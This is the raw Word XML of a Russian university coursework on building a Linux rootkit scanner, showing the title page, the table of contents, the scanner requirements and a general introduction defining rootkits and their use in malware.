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FA0" w:rsidRPr="00067FA0" w:rsidRDefault="00067FA0" w:rsidP="000B25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FA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0B2576" w:rsidRPr="00067FA0" w:rsidRDefault="00067FA0" w:rsidP="00067F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FA0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профессионального образования «</w:t>
      </w:r>
      <w:r w:rsidR="000B2576" w:rsidRPr="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Казанский (Приволжский) Федеральный Университет</w:t>
      </w:r>
      <w:r w:rsidRPr="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2576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FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00067FA0" w:rsidRPr="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>НСТИТУТ</w:t>
      </w:r>
      <w:r w:rsidR="000062CD" w:rsidRPr="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В</w:t>
      </w:r>
      <w:r w:rsidR="00067FA0" w:rsidRPr="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЫЧИСЛИТЕЛЬНОЙ</w:t>
      </w:r>
      <w:r w:rsidR="00067FA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> МАТЕМАТИКИ И ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876D7" w:rsidRDefault="003876D7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НОГО АНАЛИЗА И ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292300" w:rsidRDefault="00292300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300" w:rsidRPr="00067FA0" w:rsidRDefault="00292300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90900.62 – Информационная безопасность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2576" w:rsidRPr="00B6266C" w:rsidRDefault="000B2576" w:rsidP="000B257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576" w:rsidRPr="00B6266C" w:rsidRDefault="000B2576" w:rsidP="0029230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B2576" w:rsidRPr="00B6266C" w:rsidRDefault="000B2576" w:rsidP="000B2576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47E04" w:rsidRPr="00292300" w:rsidRDefault="00247E04" w:rsidP="00247E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2300">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidR="00292300" w:rsidRPr="00292300">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>УРСОВАЯ РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2576" w:rsidRDefault="00292300" w:rsidP="000B25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7A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПОИСК</w:t>
      </w:r>
      <w:r w:rsidR="00714386" w:rsidRPr="00697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A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>РУТКИТОВ НА ПК ПОД</w:t>
      </w:r>
      <w:r w:rsidR="00714386" w:rsidRPr="00697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A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>УПРАВЛНЕНИЕМ</w:t>
      </w:r>
      <w:r w:rsidR="00714386" w:rsidRPr="00697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A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ОПЕРАЦИОННЫХ СИСТЕМ</w:t>
      </w:r>
      <w:r w:rsidR="00714386" w:rsidRPr="00697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A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">СЕМЕЙСТВА </w:t>
      </w:r>
      <w:r w:rsidR="00287C38" w:rsidRPr="00697A38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97A38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INUX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472D07" w:rsidRDefault="00472D07" w:rsidP="000B25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D07" w:rsidRDefault="00472D07" w:rsidP="000B25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7A38" w:rsidRDefault="00697A38" w:rsidP="000B25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7A38" w:rsidRPr="00472D07" w:rsidRDefault="00697A38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Работу выполнила:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00697A38" w:rsidRPr="00472D07" w:rsidRDefault="00697A38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Студентка 3 курса гр.09-311</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009942A2" w:rsidRDefault="00697A38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«___»  ___________  2016 г.</w:t>
      </w:r>
      <w:r w:rsidR="00FD7C1A" w:rsidRPr="00472D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            _______________               Е. В. Родионова</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000635BE" w:rsidRPr="00472D07" w:rsidRDefault="000635BE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42A2" w:rsidRPr="00472D07" w:rsidRDefault="009942A2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Работу проверил:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009942A2" w:rsidRPr="00472D07" w:rsidRDefault="009942A2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Научный руководитель</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009942A2" w:rsidRPr="00472D07" w:rsidRDefault="009942A2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>к.ф.-м.н., ассистент</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009942A2" w:rsidRPr="00472D07" w:rsidRDefault="009942A2" w:rsidP="00697A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D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">«___»  ___________  2016 г.           ________________           </w:t>
      </w:r>
      <w:r w:rsidR="00642C93" w:rsidRPr="00472D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00472D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Д. А. Долгов</w:t>
      </w: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576" w:rsidRPr="00B6266C" w:rsidRDefault="000B2576" w:rsidP="000B257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576" w:rsidRDefault="009320F4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ь </w:t>
      </w:r>
      <w:r w:rsidR="00472D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173" w:rsidRPr="00B6266C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472D07" w:rsidRPr="00B6266C" w:rsidRDefault="00472D07" w:rsidP="000B25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377123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2373" w:rsidRPr="00B6266C" w:rsidRDefault="00D6646B">
          <w:pPr>
            <w:pStyle w:val="a4"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B6266C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100D9F" w:rsidRDefault="005C23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626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26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26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1125769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100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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69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1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0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2.  Краткое введение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70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1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1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2.1 Что такое руткиты, использование во вредоносном ПО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71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1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2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 xml:space="preserve">2.3 Обзор ПО для поиска и удаления руткитов в </w:t>
            </w:r>
            <w:r w:rsidR="00100D9F" w:rsidRPr="0080511D">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux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72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5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3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100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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Методы решения (как работает антивирусное ПО)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73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6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4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3.1</w:t>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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Методы, примененные при разработке сканера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74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7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5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3.2</w:t>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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Вспомогательные результаты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75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10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6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3.3</w:t>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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Итоги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76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11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7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3.4</w:t>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r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77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11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8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Приложение 1. Исходные тексты программ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78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11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79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Приложение 2. Результаты тестирования сканнера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79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15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100D9F" w:rsidRDefault="00C014C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125780" w:history="1">
            <w:r w:rsidR="00100D9F" w:rsidRPr="0080511D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 w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc451125780 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00100D9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005C2373" w:rsidRPr="00B6266C" w:rsidRDefault="005C2373">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B6266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8C1D12" w:rsidRPr="00B6266C" w:rsidRDefault="008C1D12" w:rsidP="000F5ED4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00554391" w:rsidRPr="00B6266C" w:rsidRDefault="00554391" w:rsidP="000F5ED4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00554391" w:rsidRPr="00B6266C" w:rsidSect="00554391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B2576" w:rsidRPr="00B6266C" w:rsidRDefault="007E6913" w:rsidP="006D7B09">
      <w:pPr>
        <w:pStyle w:val="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1" w:name="_Toc451125769"/>
      <w:r w:rsidRPr="00B6266C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Постановка Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00217057" w:rsidRPr="00B6266C" w:rsidRDefault="00217057" w:rsidP="000B2576">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00217057" w:rsidRPr="00C957A9" w:rsidRDefault="00217057" w:rsidP="000B2576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писать утилиту под операционную систему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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/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ля поиска руткитов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E6913" w:rsidRPr="00C957A9" w:rsidRDefault="006B1BDE" w:rsidP="000B2576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Требования к утилите</w:t>
      </w:r>
      <w:r w:rsidR="00217057" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: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озможность сканирования как всех доступных директорий, так и директорий по выбору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Относительная быстрота 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Сравнение сканируемых файлов с файлами реальных руткитов посредство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125C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5-хэ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ширования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00217057" w:rsidRPr="00C957A9" w:rsidRDefault="00217057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B147E3" w:rsidRPr="00C957A9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B147E3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B147E3" w:rsidRPr="00C957A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B147E3" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“белого списка”) для предотвращения ложных срабатываний</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F655E" w:rsidRPr="00C957A9" w:rsidRDefault="007F655E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ывод результатов: путь к зараженным файлам, общее количество файлов, количество отсканированных файлов, общее время сканирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F655E" w:rsidRPr="00C957A9" w:rsidRDefault="007F655E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5C4DF2" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в файлах потенциально опасных </w:t>
      </w:r>
      <w:r w:rsidR="005C4DF2"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C4DF2" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-команд (например, </w:t>
      </w:r>
      <w:r w:rsidR="005C4DF2" w:rsidRPr="00C957A9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5C4DF2" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="005804F0" w:rsidRPr="00C957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C4DF2" w:rsidRPr="00C957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4DF2" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B147E3" w:rsidRPr="00C957A9" w:rsidRDefault="005D7B46" w:rsidP="0021705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Сканирование файлов, задействованных в процессах по определенными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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -адресами</w:t>
      </w:r>
      <w:r w:rsidR="00917296" w:rsidRPr="00C95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913" w:rsidRPr="00C957A9" w:rsidRDefault="007E6913" w:rsidP="000B2576">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E6913" w:rsidRDefault="007E6913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Default="00907887">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00907887" w:rsidRPr="00C957A9" w:rsidRDefault="00907887">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E6913" w:rsidRPr="00C957A9" w:rsidRDefault="007E6913">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E6913" w:rsidRPr="00C957A9" w:rsidRDefault="007E6913" w:rsidP="007E691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451125770"/>
      <w:r w:rsidRPr="00C957A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92DAF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1A1445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</w:rPr>
        <w:t>Краткое введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="004F38C9" w:rsidRPr="00C957A9" w:rsidRDefault="004F38C9" w:rsidP="004F38C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51125771"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1 Что такое руткиты, использование во вредоносном ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00B6266C" w:rsidRPr="00C957A9" w:rsidRDefault="00B6266C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Руткит (англ. rootkit, то есть «набор root'а») — набор программных средств (например, исполняемых файлов, скриптов, конфигурационных файлов), для обеспечения:</w:t>
      </w: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•</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>маскировки объектов (процессов, файлов, директорий, драйверов)</w:t>
      </w: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•</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>контроля (событий, происходящих в системе)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B6266C" w:rsidRPr="00C957A9" w:rsidRDefault="00B6266C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•</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>сбора данных (параметров системы)</w:t>
      </w:r>
      <w:r w:rsidR="00CC5391" w:rsidRPr="00C310F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002807AD" w:rsidRPr="00C957A9" w:rsidRDefault="00CC5391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Установка руткитов может быть автоматизирована</w:t>
      </w:r>
      <w:r w:rsidR="00FF7016" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> или</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> же злоумышленник может установить его, как только он получит доступ с правами администратора</w:t>
      </w:r>
      <w:r w:rsidR="006E0051" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002807AD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступ рута). Получение такого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2807AD" w:rsidRPr="00C957A9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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>результатом прямого нап</w:t>
      </w:r>
      <w:r w:rsidR="002807AD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>адения на систему (эксплуатация известных уязвимостей (системы, утилит, портов)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002807AD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">захват пароля, нахождение </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">«трещин», </w:t>
      </w:r>
      <w:r w:rsidR="002807AD" w:rsidRPr="00C957A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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>прив</w:t>
      </w:r>
      <w:r w:rsidR="002807AD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>илегий или социальной инженерии</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957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C5391" w:rsidRPr="00C957A9" w:rsidRDefault="002807AD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 w:rsidR="00F47017" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">зловреда </w:t>
      </w:r>
      <w:r w:rsidR="00E50401" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>становится возможным скрытие</w:t>
      </w:r>
      <w:r w:rsidR="00CC5391" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> вторжение</w:t>
      </w:r>
      <w:r w:rsidR="00E50401" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, а также поддержка привилегированного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E50401" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95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3EB" w:rsidRPr="00C957A9" w:rsidRDefault="001463EB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Хакеры стремятся получить контроль над множеством компьютеров, чтобы использовать их в своих целях, а именно, используя гигантскую вычислительную мощность такой «зомби-сети», производить массовые атаки, рассылки спама и т.д. Вспомогательным инструментом для выполнения таких целей как раз и являются руткиты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001463EB" w:rsidRDefault="001463EB" w:rsidP="00B6266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Руткиты скрывают в системе не только свое присутствие, но и присутствие другого вредоносного программного обеспечения, вспомогательным инструментом к которому они обычно являются. Руткиты создают «черный ход» для получения конфиденциальной информации или внедрения в систему других вредоносных программ. </w:t>
      </w:r>
    </w:p>
